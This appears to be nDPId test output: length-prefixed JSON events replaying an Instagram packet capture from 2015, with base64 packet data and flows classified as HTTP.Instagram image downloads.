02377{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1436720900716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900716,"pkt":"QPMIw47hABsv8H60CABFAAW+uH1AADkGTewuIUagwKgAZwBQl6CnSNXfj\/UmaIAQAiku5gAAAQEICprfPdsAA+txSFRUUC8xLjEgMjAwIE9LDQpMYXN0LU1vZGlmaWVkOiBTYXQsIDExIEp1bCAyMDE1IDE2OjU3OjA4IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9qcGVnDQpDb250ZW50LUxlbmd0aDogMTUwMDMxDQpDYWNoZS1Db250cm9sOiBuby10cmFuc2Zvcm0sIG1heC1hZ2U9MTIwOTYwMA0KRXhwaXJlczogU3VuLCAyNiBKdWwgMjAxNSAxNzowODoyMCBHTVQNCkRhdGU6IFN1biwgMTIgSnVsIDIwMTUgMTc6MDg6MjAgR01UDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/+0AfFBob3Rvc2hvcCAzLjAAOEJJTQQEAAAAAABfHAIoAFpGQk1EMjMwMDA5NjkwMTAwMDBjMzQ3MDAwMDEzNjQwMDAwNjM4NDAwMDA4MzJiMDEwMDBiODUwMTAwODdkZjAxMDAwZDRhMDIwMDlkYTIwMjAwNzY3MzAzMDAA\/9sAQwAGBgYGBgYLBgYLEAsLCxAVEBAQEBUbFRUVFRUbIBsbGxsbGyAgICAgICAgJycnJycnLS0tLS0zMzMzMzMzMzMz\/9sAQwEICAgNDA0WDAwWNSQeJDU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1\/8IAEQgEDwQPAwEiAAIRAQMRAf\/EABwAAAEFAQEBAAAAAAAAAAAAAAUBAgMEBgAHCP\/EABoBAAMBAQEBAAAAAAAAAAAAAAABAgMEBQb\/2gAMAwEAAhADEAAAANnYrv6OWePnpwvl4Ucr5ZqutmsxzGNFZbBKECWI2oX8gp+rqOdscgJarTJrPTiAtUZEnHz0qOljcEskD1c01Rksi2ko7C10FaSJqLDY0bkkglRK+J01IqIm99eIL6jmheWgjCKVJUTsjcmxJXNVG3K1KNr3irtvMCithKVbraoq9cQKb5mse+vydpRzhEXinDIvFyoIspSDsdW4LfVORbSFGS9z0Q07Vapihe24SRFCV8D5p7U4fInJNSacY9CnDoLekTpOusTppdQVRUWk5Z3S6nSOaiisOZWrWqtSjFjqVjcxzA+ktxbdV5FmYfOO1PR5O6tOVN6dGCvruavqOenPG2AT0hWptvhfNzvglTijkaS2WB9FlYElvdXcE7qNkc6sYnO6nwWWwvB6cwHJ3BI+Pk7LqzU7SQPCRiRBzWw1M8o9Wr7h8yd2Yes0RUdMne6nInZbXUcjq0gpefEOw6FZdhsSpo1\/NNSRGRwz8KussbUKdHc9LXYK7JQkHbZE9CMRrLHVuCy6tIhIp+ajbOxDZOaN8kM6b52TRosiOmpWqktXN4fR9WcyxQQ3Mi1m1NxKzxO57gjldCOau1Guh6KocxG0s90jNuePlRqSaiqL7xrhlZBD1ROCogrq0VC86jwXI66CmfUcy84e5MlIKemSZRcnZWo5lqOCIVpafMuyjnIKtHOmrjanNWmV0at9VUdlavIty0UHfcNVBHhvASbQRlyCBWndG1xZlpvVXVpuTtPpPHelHPmiqjZJuxJVci8tKRVa6m0Lsg1QJNocO+lKMV1BqVN+Km1zbjrI1P1ZzUr6iNEZRL5ZRw56q6yDgmfWQLsg16ZNg3hkHi+ETQdInbdS4duCJorHU42r7hqMKoMQCnCeAuojkF0F8BRBzhkEpcFpK6im5sQ5GRJU57qi78tptbhTpBzLHQKE7qrwsdX4LS1+Ts9Uc1YWugWOruCfoFCwtRydla3CsLCo7DIlTl6FQm6BQnWuoT9DwSpCoS9DwTdA4JVrqE\/QKOx0ChM6u5EjoeCVY+ZIiIA="}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1436720900717,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720900717,"pkt":"ABsv8H60QPMIw47hCABFAAA0wXFAAEAGQ4LAqABnLiFGoJegAFCP9SZop0jbaYAQH+o19wAAAQEICgAD63Sa3z3b"}
02375{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1436720900744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900744,"pkt":"QPMIw47hABsv8H60CABFAAW+u1hAADkGUttSVRqiwKgAZwBQ4lApkhzMOpIM7IAQAku18QAAAQEIClYLL1sAA+txSFRUUC8xLjEgMjAwIE9LDQpMYXN0LU1vZGlmaWVkOiBTYXQsIDExIEp1bCAyMDE1IDE2OjMyOjE3IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9qcGVnDQpDb250ZW50LUxlbmd0aDogMTEyMjY4DQpEYXRlOiBTdW4sIDEyIEp1bCAyMDE1IDE3OjA4OjIwIEdNVA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0xMjA5NjAwDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/+0AbFBob3Rvc2hvcCAzLjAAOEJJTQQEAAAAAABPHAIoAEpGQk1EMGYwMDA3NWIwMTAwMDBjZDFlMDAwMDUxNmQwMDAwYTY3YjAwMDBkMzhhMDAwMDQ3MTMwMTAwZDU4MDAxMDA4Y2I2MDEwMAD\/2wBDAAMCAgMCAgMDAwMEAwMEBQgFBQQEBQoHBwYIDAoMDAsKCwsNDhIQDQ4RDgsLEBYQERMUFRUVDA8XGBYUGBIUFRT\/2wBDAQMEBAUEBQkFBQkUDQsNFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBT\/wgARCAKAAoADASIAAhEBAxEB\/8QAHQAAAAYDAQAAAAAAAAAAAAAAAAECAwUGBAcICf\/EABsBAAIDAQEBAAAAAAAAAAAAAAABAgMEBQYH\/9oADAMBAAIQAxAAAADRJrP1fOIlpAgZgklAaSWREiWQ0hYBBKMG1GQ0mshINSQNKwDZqISVGBpCiEDBAlSiBIUY0GoAhRgEhRMIlm0hLpRTallISS1AgnEASgbEmowbUamIMzBKgaCCgBEs2NLM2INRiSFhiApTEksNJDhobBqHjA10yQHEiSSgCQoARGYJBhCQZgklkCTCgQThDSSzabMzAkuECSUY0gwJJmbEGogIGpiCWaEBSgbNRAk1hiCcJCDUGkGshpCjEkKVJthagbCzEgKMEmYAjNQICzaaWoAhZmxAUYIUZySQsAQcITZqJSxlGVMgDAJCwCUrCEBQYgwoEBQQkzAJBmxKXSBBmbEAGggowSlYBIcQJKloYRrJCQtLEmsASVhiA4kRGYGQUQkk4AQsEwgswbNZNESw2kzUk2awBJdKQg1KQ2ow0ROkNBOpEk1BhBZtEDMASgCCdCMMwuixAcIEBYE2HEjbNYBBOkNAUoSCWTaTCiKSWBthwkkBZAQUGINwDaCjkkhZobDgBCXDE0pYbQThobDiXEicJjalhNIMCSayBCjAEa0ySQ4QJNQYkzMCJYBBrMEEpQIDokIJwkIUoMSToBClAEGtQkEs0YClHRYk1pBIMwbNQYgnSYgLIEBwkICyYhS0tJCxFthwmkKMASVmhAWbEE4TSQsgIGpNBLIRBQaQayBJOAEBwMQFpAkukCQsAg1kwjMMCVgRGahtk4ASFmDYdSCQtbGjUbRJdAkBZDILMTalGxBqU0hLiYmGDXVNCjMaUrANmsIQlZttqUY2w4RFAcShClECQoCSlwmETgBsKNMgZsSTpAgKSIlGYICyESVkBBYBBqJog4E0E4TEB0gQHA00FqGlLhuKTNQINQJJJZgg1KY2ZpImFGNJLDSTWQIWFASXDBBg5BGoAgOEGEajpmg1hCCcIEEswQl5DSTM00EswQFATalGCCUYJJRg2oGCQsxoSswQow0lLgQhSgCDUGkBYEkOEDYdAIJZgk1ESQpQcUhRsSFGCQZgklgEmZg2pZyEBZgglmMiWQkhRgkOBoicSMiWbSDWGJNQBJOAMAKVVMgYiIUahNE4Y2wsNICwNCXUCIlmDRuGk2S1NsLUYIJwRbZrDSAo00GsmINQEkk="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1436720900745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720900745,"pkt":"ABsv8H60QPMIw47hCABFAAA00CZAAEAGPJfAqABnUlUaouJQAFA6kgzsKZIiVoAQH3QuLQAAAQEICgAD63dWCy9b"}
02366{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1436720900872,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900872,"pkt":"QPMIw47hABsv8H60CABFAAW+QeVAADkGzDdSVRq5wKgAZwBQ4m1aOHmGBPBEEYAQAktTqQAAAQEIClnq0tYAA+t6pEVxjNbEsTo05BJiqWC+y9Cm00IuBsqQ3OjXYmls3ooNNijoaA4JvaGXA6WBNFUSNxldWicRkqfSvQ+ysT9n0voZ+EyJR6Oy8JFg5mjiK3jhnpErGpjhG8skeRODdCdQ2MDy8miGRvQk1oSZFhVmGQ28jcag3sVEigomNJgo2R5DYnSdEiIuyPaJg2JvQlTQl7HH2PCFhjS9CYo0RCdlSaY2qVbA7SVlukMk60Nrou0FvVb7YyZLsTJUNNjXYcKjL2NNBHY6YRIqyEsm+g1byhIVtLCoTuULeROaIZSg30H1KXibE4I6MNQaNsuwl6EmkRW2hNPKHVGvY2h4LXCptXgsREUx4KkzYc6itsZrGceuCUwiNvZ0NlpU4bHVgOMeBQT+hXsW4NkxniYRKY0LOGPOuJ3wxvNY30XInTbyUHSrYx3BbGhCWhOLAjiZyQZFUJdjY3cIt4ZOkJvIlCy+hRiRG+RuPBllCy6VrIsIWMN5wEbUZGNRwXYxYMsCZvBM0SI+CRpDbsamyBbROyZoo8CJEl6E9mJ2S8EM3LEKN5FGYSlBs8UdkxmA2mpRC0zPZ7xJ9CwL8H7GJMEIRrTFqwKrYnyiJkSFrOodENU0wTGWNK2jlI9lfZlilokuhJLsxJCYIN4hejdRoOrIspMTJA01hjZUKPFINeESqCUMEQXvhWETJONsmi4g1wbPQfoNvgSpYMGCvY9YNIqvA3SQSmRLI4YPo2XNMYImYP1DY4jPgTTw2RtDTZj2bUhs0VbI6JdDjHkaG0not6KSwmmsQgk2Q2d8EY0NThbnDb6LikplbG2dZcC3WN4yZoyEhYNBej0BWx7I90tpJlyN42ZDbInnJ1C1j9i4ezDdGzUCRBRluhyJbIYWhtD6NOhqmcKFroh5EphFtxoj0LHA27N4EuzbHNiablHlZGpBOsMNmxNFXQsIyISmhtLI00bJ7F+j1S+jDRaWi3vmNnZe2dMzFsHjJciezaGpgnsUwLB9OsnZ3niE9jVXaWBDK2XAvaENk6N0ekQ2O9mkVid2JeCeikitCaY2qSMSexWxPhK4FBtCR+iXk7ssgLA2L0SCdTorMmVWF2XC0NTE0Jx1GuCltCJQTg1LLSyaM2UJLoSF6DFF9Mw9kaL7IKmI4MmxmzPiZWtisp9MNxiCdRNs2PYXFI7EHTI1SpITxUMwngXpkyZLmoTeRzsWCnZ+DfRVtifokzCxuYoykLQuIaLckmHw90WsHeOLnJ84eDeStIr0XApBloXsSFOuGxPJSo9D4JV5INNsaqEnFWmLKwNNiDhZETR+8N0hPQnDfQ9jUeRJC3L2abSUYrSyXKQvTLUJ0TMDXTG22NpLA+h7pbgbPbEFhURZQjQj9GNi+DZGcFGLsjYTTQlYRp28M2yQyxotDecoU0R2IEl2iJYG4illoT0E0yNMauOGKUSPA0mRrZpNHQ9mUtCe8LiDqwZ6FGTD0YCawPKG6VPR1B6om0oVtJszsT2oPLg1iChibE3sd6Emqj9QlcmEXhv0J3fFLW0UaJbG7obENhs2LInSGhYWLA09oR2MwU2WaOiiYyFETeCZiGhtrYmeGRtwUYEs5HJsYE8FFhHQyA82YMmWhvJ+luERPJpCaXRrgavgriCd7HBcZJXUMHg9aNwpE0U5guCZyNlQ8sSjo1kSMsTUUFRQbOhYwhtnKP6SOXI1R12JOnuIeq2VMpZgm+hdg0iYglGUXsWqM1gbLTRccdQh6Ku0exnodIIyzBObLeyzRbgl2MPIvcF+DTaqR8HaG7s1kuabRjJ0TpPR2VPJV7KLKyJPRF0V2DRrKEZhaNsjpZo9uNoKHwaJdi0JwbUojVhqtMTJ4I0NdDcP0bBkIaxSOjsCQm08MyRGoPKyP2uPoVQ="}
02372{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1436720900873,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900873,"pkt":"QPMIw47hABsv8H60CABFAAW+QeZAADkGzDZSVRq5wKgAZwBQ4m1aOH8QBPBEEYAQAktstgAAAQEIClnq0tgAA+t6yOoxEtjJYMe0j6G03geIuahaK1oTHsEliMMTZ8IV3w+jNLnJcKpRQYoNH0Q1owU7ElIg1BvY00M1sKh00GrYYaKmxapIfSuhKlliV5Ggz2ZEdUXqEuURYhcRmGdF6HkVYKkoGKmh3bGvRvDFLCRD9sysMedkSiftieCrscIysGDeGZuR52JNFJwy1gdIqmuE8SC43k2NNmXvnK0LZ7Q9kdYKlspkg9CZoqhXWJtbKpgafXBrJWhOsqdlcjGlMIf02UEyYUEoN\/R3BPJjY2bCG2s0iEvRRNQ+jO4xqKDwyI0ohahosjThi9BIrI7gehuDWUCCJLBXotaGI3Qlg0wJ4IVBKoTow2PA\/UqeR2ILqdQ62OGMraO4hekPhuNoceBSE3cCJmskaK+hP2IZK1kxs+D0NwaUQbYMYurNlQeMoTLYsrBUslTyTGB4bJjIpUh1Csyxlol2o3gucCaI7VzLkaJHRLOOI9DqwQy9GXvictCZRvBROF7M75lwMNqMbA1Q7yIm8GJWsFybGm8jbOi8hKnkr2M2jAtIEustYo61E\/YmmP6L0b3whJbGvRDYcGUzATfFIDVQIw2Oobux01kTo0N6FINdmGBYdKOUophoRJtodkbFVo9gsdiVGqholRuBaWjGKEmDKSSFXnjQZrsSagmHGQ2V6YSOqJlWjZkzB3BjS9mOWLBMSDwqGspicFTSY2vRnKTsOEJT6izJU3UzZMYLFNbFHhcKrhEElmjUHgsGw3eFliqL7LktKtGhuCzshGkdcMxokwNDSEy0x5WRazwkNsaY8bLNjG6JXCGsDRGmNiieYQKFSLNMh9GJBBqDcYmQ\/TLYs4Y5okeCCq6KrROsWRPA\/QgqexNDwJeyORUtLVhijncHacZgTImKglDuKPKPiNMVuBBPFGsVisByZlsa7HsdRZxjrKIyEiLkwMS2JuxPlJTJB8H6bZlkrSN1n4byX0J4EzWxRB5yNNiRbIpUIU6KJCXaHjR8G5KJ9CS9nWBuYG8YG6i9HshCfoTL7I9i9svs2S0igzvAmIqQvhrDHLkQf6KrgpKCatLEWjeRJbOsDeINKDg0ui5F0zaibWWN0bpi9BWZoEHKMpILVMCwVlji1gwwlSnhCVWC+iHqDPofxpWqTM0eNJ2xqh8YRjmCGxosC24xO6HlDsYiabHsVY3Q2j8FwXDnhHTop2I0ZBKKmqh+g1MksMLJUzHQ4tCWBioqFxpAlEhOSDo8Dagmn2S4NI9pDj9P0qphlFmxt9ob7Q4fDeWdIS9mSomrgesCHk9xVyISbeBYZYqOnkRY6Qi+xNoTGi3wtcJ8IdEGuiiJs+CUCzHWBIwyehKjUWCjSYQ2xehJQkV4bmCDSE3ajpBI9MbbKsnYhMqSE6SoSmxVZQz7F7Cxw52a0Oi4wa6G80SyNISCZNs1kTWjAjbEjBSIX0JgVNEej4YLk6FUNkLSpOMieS4G8EdEeg2KpGUxUsEchDaYw1FYKjISLZtH5xdj6MjnZrR0KQaPJCYqtCpZNBN3Ym8GJNCRoeRqPAyVRi2Jvp8EoJ4hRsvRtEZTjFNsRZ6Lg1GM+iyL6KpBqRssXcg5w2Ui1l6HGqjFFnaPpYhNtEfI6Fk9p+jWy+h1jWBucKo6btHQ1cIbLY6jKwI1kTtCe6OF7GyQ+luTvB+OCeRZE8Cjzw\/QQ2lsbbGNL0REErSTiKuDRksFTw2JZIJTbY1oaZGzXwTzsbdEiLmog0Ji7YqmN+hroiag0PQeUVDI9mcQw6G101ZROVMQtGQ7eH6WaIbNDwsDsK10NpNDbcMrspisEOJISYYqTRU0RDqgVWGQxaXIsvmpFmWPDA8JDDqHRSQsC9DYnnBYhpbF9KmJvaYk7Ktm8jfrhZcJnL5r4twNjbk="}
00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720900692,"flow_last_seen":1436720900873,"flow_idle_time":7440000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3095,"flow_avg_l4_payload_len":1031,"midstream":1,"thread_ts_msec":1436720900873,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-f.ak.instagram.com","url":"photos-f.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11424623_1608163109450421_663315883_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}}
02391{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1436720900875,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900875,"pkt":"QPMIw47hABsv8H60CABFAAW+G2lAADkG8rJSVRq6wKgAZwBQrVt8zLRbo9aCTYAQAxSDewAAAQEIClRjBa0AA+t+qDhdSVH1chUH1JtbCJY\/b9U\/35z\/AIcB2iAbyHujCEFNZ+I0eU8EOIX\/AEB\/qRwVo9Wlp5znKiVYRroroyxNdVdiE6kdYXRMS3KcwBs+EyuWZYuo52fCGCiRaGhDCm0eStltza5zDLVQe2oxt2qbSrdR5pHTZPJaAK7JTxSrekwfflKFROdJwg5Y1CyNVSaHSVxDS0CVTMOVI9v3UgC122i67XHxCfXa5p2RquKuPMJ1XpUxG6NIvp3blVKRpiVRMtCZ59+YOFU7DcnU6dTOhRpECHZCLSwomfujLIK9xojog5ZGQgQ5VGxza\/YotDtEQRr+RTZe72UhDK0U\/Sg+fuESn9pT0VTtKEFOlWOQYBlU6VNyNOjonUmH0p7LdOTSD6k6C1Oj5p\/wckoMOHKYPO3tlU9WFVKbrygB07fGU4txhOccQn+qSgN0CjqgJbEqm5ow5FksvA7VeZ7f3Tajd904VNW6JjQ5ncntFPTPhDtGVPjVZB91ncoRE8oIyp5N9S4cEODlVJp1JmA5fEBxtqYKqUOqP+\/zSg5U2tcI3K4r1W6whjKbVcNE4l2TyDtij7fIFHV4f3CoGWKuyWKj6ICHjmTYVF4grovG6HUCdTvzon0H6hVh+C1MMIt8ICE07KNwg+cFOZuEeTXFquDtU5vj5onCADRCuEIOGmi9bcI9qe6Hh\/lSnr\/LyBA0QtO6w38TUIwWwCvsgy3VFt7sqxzT7KwyZTqc5blYj3X06flx+dK1UrEqM45DARcbWwqkkymmJC+hEywLVAnRSFLZ0Uh2F02s75QrdN3lqFtZuO1OGwcuGqOAgqpFMWFAx6lcXdgGuiNNzYCtMzGE+FGJWdEJR5BUG9p91xTbqM+Ewy22pp5VKoaLu4\/b5BzCouE52V4uc5eoyu2IHzQgtMrhTPaqXY51NHLYVLteWrXnUbcEx1pUhytVgUIjzlVKH10\/2UhqqcmlOQfGqIDtF7I45NMpzflptJyiG\/dbyiJTaj6ZTiKrbmo5ZHhMMtRKf5RzypychE\/TsrBP6osiBO6jfYoVBq4Jz6ZGNEfUA7KqOaIsRYcFuUx8DCcaZ9QXSpu0cjw7\/pyoI1\/xGLV7rflJtjkMIOwg4rTVSeRlD3WuyIIAXoy5qI\/DENgr4jNzxlPqdUrUhEuZmFfdl26N8xOAjGpXr9KDMp\/b2cg5m4lf8u76E2rRtxKi+mQqYlpb4VNj\/S8YREfJPzBEfKCVMohcObXqr2Vg\/wAoZTxbXnyhp8j25QMIOKL0AdeU2PhcRSg3t3TXfS5FiaY1TvI5B0JrhqnsZU7giFog4OwU4cxkwtBCPLZaoE0nIgeoaJuJatkdORVDu7Toi3xGE7KLogHZdS37K7Ca7OUXI936Koe0CUDyCBTg2qId+6LS11rvzZ\/KZqoJ5brPLTlEqFoVKuOCobMhCqWm1Q6YKtduV+OT5hOoPnKDcL0EYwpFTRQ3Mp0GIELLsnZXv0CudC115sBLwAumQ2Vw7vxLTo5VPwqxxKbWp7ynCfyJwpUrqNIh3yxATdVsqUmqFUZ1GLh3EiDsq7e27wm6IhBQnBQoTGSZPIhVh23eFh7IKLc2ldzcFEbpr9kfPNr\/ACqudEeV550hHepk45Bao6qoMSqTx6XJ4teObhypm39E24i9wQd3SVUI2TsnKnZXYgrJ0TO3ITjPIK5XJpVRvVb77f4WZ5M9QUG4hbcsrbkFK+3INkwoA7TsrTspB9WEa3bnXyu5xl6p1XUk6qXbo5gxgJ\/cwRsi0jVNBQLtxhXSSSnFzk4QMr6UQYley4MfidR2jVVqGpk4b48oVXdZrzsuNbkOCHDuPc7tHvycN\/ywOYTlupwuHbm9bJ3Y8P8AKIuCpnCBwsSgii1WocyEzwuKp4s="}
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1436720900876,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1436720900876,"pkt":"ABsv8H60QPMIw47hCABFAABQv9ZAAEAGTLPAqABnUlUauq1bAFCj1oJNfMxlZ\/AQEUsuYQAAAQEICgAD64RUYwVLAQEFGnzMtFt8zLnlfMypR3zMrtF8zJKnfMyYMQ=="}
00964{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":185,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720900690,"flow_last_seen":1436720900876,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3095,"flow_avg_l4_payload_len":773,"midstream":1,"thread_ts_msec":1436720900876,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-e.ak.instagram.com","url":"photos-e.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11379148_1449120228745316_607477962_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":202,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720901182,"flow_last_seen":1436720901182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1436720901182,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"77.67.29.17","src_port":33976,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1436720901182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720901182,"pkt":"ABsv8H60QPMIw47hCABFAAA0W\/BAAEAGs3DAqABnTUMdEYS4AFDrYaSj8+woZ4AQH+origAAAQEICgAD66NkobAz"}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1436720901182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720901182,"pkt":"ABsv8H60QPMIw47hCABFAAA0W\/FAAEAGs2\/AqABnTUMdEYS4AFDrYaSj8+wze4AQH+origAAAQEICgAD66NkobA0"}
02385{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":204,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1436720901183,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720901183,"pkt":"QPMIw47hABsv8H60CABFAAW+nH9AADkGdFdNQx0RwKgAZwBQhLjz7DN762Gko4AQAq9DyQAAAQEICmShsDQAA+ufWEdJBRPnaSmosKHYDmQEyGHV3GAwTrGe5kQxyGEYyxmyELBrJc+SMi3dmmwq1mAYjd9asgZG6SWIbmuecSeibLvJUKPOw0JlNLd+SsFoR4AyWWZMuWzjy22t8lg9nL1yby0j7G5yGHP2UfvrthqhUQLZPhRPRii5ZImLbbxtBh75Nwi10QstpiiOURwgsk\/gse0fhODW3xEaIlCTuwGMxEsajO6KBwgVZE4oD8EZJ8CUI+IftidbAnEAzCB+CxiXeSUkT7I4PLvoy1NnMNCUuGI63ybZNQBpkMtmgmFlmfthxhK9DguCw4XPNprshLbUVoAbHdBaG0WibQPaUDoawN0QnEMFu5OOsEXu+c3ydgozRy0R9FbV0F8hsoSyHLIicGyGMakQqAYSTks8J\/2+\/kORfizOWuAtMcMCSaUPfEY6f\/ttodWXWPLX7bzs5o8i2FH5IZ4wLEpEOhwV2MADYJIWDBmF9CQdn6hh1kzmvWM7b4SuFg+iI0QmrTgRgMl\/rAMZDtwdyKQyk+DPksJTgtrhZZRA\/GY+X2oyKfiboDY0NouOzUthrGCw4ToWxqMKM+rf1sDDAEsjSzJB7rCfcDOwibANVH23SwWhh5rFCY04ksXdhurOKpIBQXzCwN2yHF8S1j2hc2z0kMsCW+OeS+e5HaaRoyzZaCzPNrgnwkhY7i8yZQkeMkH4woSzgHZw7AMoJTs5nD21BiRDuFCBqB4lGX+kk55UTfE62aMJ9jBPBhqltnyYDTEarQKEsWGbVjV7cRHRc\/JgmbZkQlW0YI\/xZdFg6wN2R+J3fOBbBmIcOvB5bIKiWTEFFXRESk7pA\/G3UwXXKB8XDGTJIAkPv49GZuMRZBkC+FhZzCzZ\/iYJh8LIJjV10uzY7Q6E8RpFbyee3Ru25UC5ETbDsFPCaR1ZZC+Qlrsu3Z2QOnm5Ijct96wHLCiQoCUx5CFCGTynRCNjadMyB8tlLRKCwv7KX++dvy1I4Ngs+X8bALTsRQ81XIDydJihBYicmO+O5EykyOu25b+jIYCOXX2WfISuvyX8JiI2GJxqYZEg+OZPoDhxBrn8TYtguClNRehGIQDtqZcwjb\/V86w0sQMOHMZzpnYBjpA8i2eJoGlmik3CQHHMRm8DxLkyFvCZWDFGTUEVI6mHEnfCoaSoN+\/pJIKAlCT4XxDOVC6F8g19jfq1eEJAj0k3u3yFtEJC0DXJolurtJkzJ6y5KHJWSGujZ7ucFS0YjpIoSX0blPAySPJvg33fP2OLma7cQ\/o6PyUHgctick8cobWRNWzIJG3koi8vkKbBIHEMIhdatBUZ40k